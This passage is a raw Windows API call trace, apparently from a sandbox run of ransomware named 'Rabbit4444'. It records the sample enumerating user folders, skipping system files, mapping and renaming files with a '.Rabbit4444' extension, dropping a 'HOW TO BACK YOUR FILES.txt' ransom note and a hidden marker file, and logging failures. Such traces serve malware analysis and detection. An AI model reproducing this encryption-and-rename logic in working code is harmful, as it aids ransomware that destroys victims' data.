hTemplateFile=0x0) returned 0x278 [0048.514] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.514] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13982492280) returned 1 [0048.514] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=13161) returned 1 [0048.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0048.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0048.514] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3670, lpName=0x0) returned 0x298 [0048.514] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3670) returned 0x70000 [0048.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0048.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0048.515] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13982626937) returned 1 [0048.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0048.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0048.516] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.516] CloseHandle (hObject=0x298) returned 1 [0048.516] CloseHandle (hObject=0x278) returned 1 [0048.518] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\qIBn Mru7Ws.mkv.Rabbit4444") returned 61 [0048.518] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\qIBn Mru7Ws.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\qibn mru7ws.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\qIBn Mru7Ws.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\qibn mru7ws.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0048.518] InterlockedExchangeAdd (in: Addend=0xff618, Value=13168 | out: Addend=0xff618) returned 16986816 [0048.518] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3361 [0048.518] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa7d0e0, ftCreationTime.dwHighDateTime=0x1d4c70a, ftLastAccessTime.dwLowDateTime=0x4f246f10, ftLastAccessTime.dwHighDateTime=0x1d4cce2, ftLastWriteTime.dwLowDateTime=0x4f246f10, ftLastWriteTime.dwHighDateTime=0x1d4cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd294, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rGivFa1k09POnyHrPjNR.avi", cAlternateFileName="RGIVFA~1.AVI")) returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="Rabbit4444.exe") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2=".") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="..") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="windows") returned -1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="bootmgr") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="pagefile.sys") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="boot") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="ids.txt") returned 1 [0048.518] lstrcmpiW (lpString1="rGivFa1k09POnyHrPjNR.avi", lpString2="NTUSER.DAT") returned 1 [0048.519] lstrcpyW (in: lpString1=0x130eb7e, lpString2="rGivFa1k09POnyHrPjNR.avi" | out: lpString1="rGivFa1k09POnyHrPjNR.avi") returned="rGivFa1k09POnyHrPjNR.avi" [0048.519] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\rGivFa1k09POnyHrPjNR.avi", dwFileAttributes=0x0) returned 1 [0048.519] lstrlenW (lpString="rGivFa1k09POnyHrPjNR.avi") returned 24 [0048.519] lstrlenW (lpString="Rabbit4444") returned 10 [0048.519] lstrcmpiW (lpString1="HrPjNR.avi", lpString2="Rabbit4444") returned -1 [0048.519] lstrlenW (lpString=".dll") returned 4 [0048.519] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0048.519] lstrlenW (lpString=".lnk") returned 4 [0048.519] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0048.519] lstrlenW (lpString=".ini") returned 4 [0048.519] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0048.519] lstrlenW (lpString=".sys") returned 4 [0048.519] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0048.519] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\rGivFa1k09POnyHrPjNR.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\rgivfa1k09ponyhrpjnr.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.519] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.519] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13982993984) returned 1 [0048.519] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=53908) returned 1 [0048.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0048.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0048.519] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd5a0, lpName=0x0) returned 0x298 [0048.519] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd5a0) returned 0x70000 [0048.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.521] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13983209519) returned 1 [0048.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0048.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0048.521] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.522] CloseHandle (hObject=0x298) returned 1 [0048.522] CloseHandle (hObject=0x278) returned 1 [0048.524] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\rGivFa1k09POnyHrPjNR.avi.Rabbit4444") returned 70 [0048.524] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\rGivFa1k09POnyHrPjNR.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\rgivfa1k09ponyhrpjnr.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\rGivFa1k09POnyHrPjNR.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\rgivfa1k09ponyhrpjnr.avi.rabbit4444"), dwFlags=0x1) returned 1 [0048.525] InterlockedExchangeAdd (in: Addend=0xff618, Value=53920 | out: Addend=0xff618) returned 16999984 [0048.525] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3362 [0048.525] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa7d0e0, ftCreationTime.dwHighDateTime=0x1d4c70a, ftLastAccessTime.dwLowDateTime=0x4f246f10, ftLastAccessTime.dwHighDateTime=0x1d4cce2, ftLastWriteTime.dwLowDateTime=0x4f246f10, ftLastWriteTime.dwHighDateTime=0x1d4cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd294, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rGivFa1k09POnyHrPjNR.avi", cAlternateFileName="RGIVFA~1.AVI")) returned 0 [0048.525] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0048.525] lstrcpyW (in: lpString1=0x130eb7e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.525] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ahcaYgdd_uS\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\ahcaygdd_us\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.525] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.525] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.526] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.527] CloseHandle (hObject=0x278) returned 1 [0048.527] CloseHandle (hObject=0x27c) returned 1 [0048.527] GetCurrentThreadId () returned 0xd98 [0048.527] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6450 [0048.527] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Searches", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0048.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102590 | out: hHeap=0xe0000) returned 1 [0048.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6448 | out: hHeap=0xe0000) returned 1 [0048.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Searches" | out: lpString1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0048.528] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0048.528] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Searches\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Searches\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Searches\\.BFC0E91B00AE8A0620D3" [0048.528] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\searches\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.529] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.532] FlushFileBuffers (hFile=0x27c) returned 1 [0048.533] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.533] CloseHandle (hObject=0x27c) returned 1 [0048.533] lstrlenW (lpString="C:\\Users\\FD1HVy\\Searches") returned 24 [0048.533] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.533] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Searches\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe63e8615, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0048.534] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.534] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.534] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.534] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.534] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe63e8615, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.534] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.534] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.534] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.534] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.534] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.534] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe63e8615, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe63e8615, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe640e7d3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.534] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.534] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.534] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.534] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.534] lstrcpyW (in: lpString1=0x130eb6a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.534] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\desktop.ini", dwFileAttributes=0x22) returned 1 [0048.535] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\desktop.ini", dwFileAttributes=0x6) returned 1 [0048.535] lstrlenW (lpString="desktop.ini") returned 11 [0048.535] lstrlenW (lpString="Rabbit4444") returned 10 [0048.535] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.535] lstrlenW (lpString=".dll") returned 4 [0048.535] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.535] lstrlenW (lpString=".lnk") returned 4 [0048.535] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.535] lstrlenW (lpString=".ini") returned 4 [0048.535] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.535] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x44269063, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44269063, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x44269063, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Rabbit4444.exe") returned -1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="windows") returned -1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootmgr") returned 1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="pagefile.sys") returned -1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot") returned 1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ids.txt") returned -1 [0048.535] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="NTUSER.DAT") returned -1 [0048.535] lstrcpyW (in: lpString1=0x130eb6a, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0048.535] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms", dwFileAttributes=0x22) returned 1 [0048.536] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms", dwFileAttributes=0x3) returned 1 [0048.536] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0048.536] lstrlenW (lpString="Rabbit4444") returned 10 [0048.536] lstrcmpiW (lpString1=".search-ms", lpString2="Rabbit4444") returned -1 [0048.536] lstrlenW (lpString=".dll") returned 4 [0048.536] lstrcmpiW (lpString1="h-ms", lpString2=".dll") returned 1 [0048.536] lstrlenW (lpString=".lnk") returned 4 [0048.537] lstrcmpiW (lpString1="h-ms", lpString2=".lnk") returned 1 [0048.537] lstrlenW (lpString=".ini") returned 4 [0048.537] lstrcmpiW (lpString1="h-ms", lpString2=".ini") returned 1 [0048.537] lstrlenW (lpString=".sys") returned 4 [0048.537] lstrcmpiW (lpString1="h-ms", lpString2=".sys") returned 1 [0048.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0048.537] GetLastError () returned 0x5 [0048.537] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms _CreateFile error 5\r\n") returned 75 [0048.537] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms _CreateFile error 5\r\n") returned 75 [0048.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.537] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8ad [0048.537] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x4b, lpOverlapped=0x0) returned 1 [0048.538] CloseHandle (hObject=0x278) returned 1 [0048.540] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0048.540] CloseHandle (hObject=0x0) returned 0 [0048.540] CloseHandle (hObject=0xffffffff) returned 1 [0048.540] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x44242e24, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44242e24, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x44242e24, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Rabbit4444.exe") returned -1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="windows") returned -1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootmgr") returned 1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="pagefile.sys") returned -1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot") returned 1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ids.txt") returned 1 [0048.540] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="NTUSER.DAT") returned -1 [0048.540] lstrcpyW (in: lpString1=0x130eb6a, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0048.540] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x22) returned 1 [0048.540] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x3) returned 1 [0048.540] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0048.541] lstrlenW (lpString="Rabbit4444") returned 10 [0048.541] lstrcmpiW (lpString1=".search-ms", lpString2="Rabbit4444") returned -1 [0048.541] lstrlenW (lpString=".dll") returned 4 [0048.541] lstrcmpiW (lpString1="h-ms", lpString2=".dll") returned 1 [0048.541] lstrlenW (lpString=".lnk") returned 4 [0048.541] lstrcmpiW (lpString1="h-ms", lpString2=".lnk") returned 1 [0048.541] lstrlenW (lpString=".ini") returned 4 [0048.541] lstrcmpiW (lpString1="h-ms", lpString2=".ini") returned 1 [0048.541] lstrlenW (lpString=".sys") returned 4 [0048.541] lstrcmpiW (lpString1="h-ms", lpString2=".sys") returned 1 [0048.541] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0048.541] GetLastError () returned 0x5 [0048.541] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms _CreateFile error 5\r\n") returned 82 [0048.541] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms _CreateFile error 5\r\n") returned 82 [0048.541] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.541] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f8 [0048.541] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, 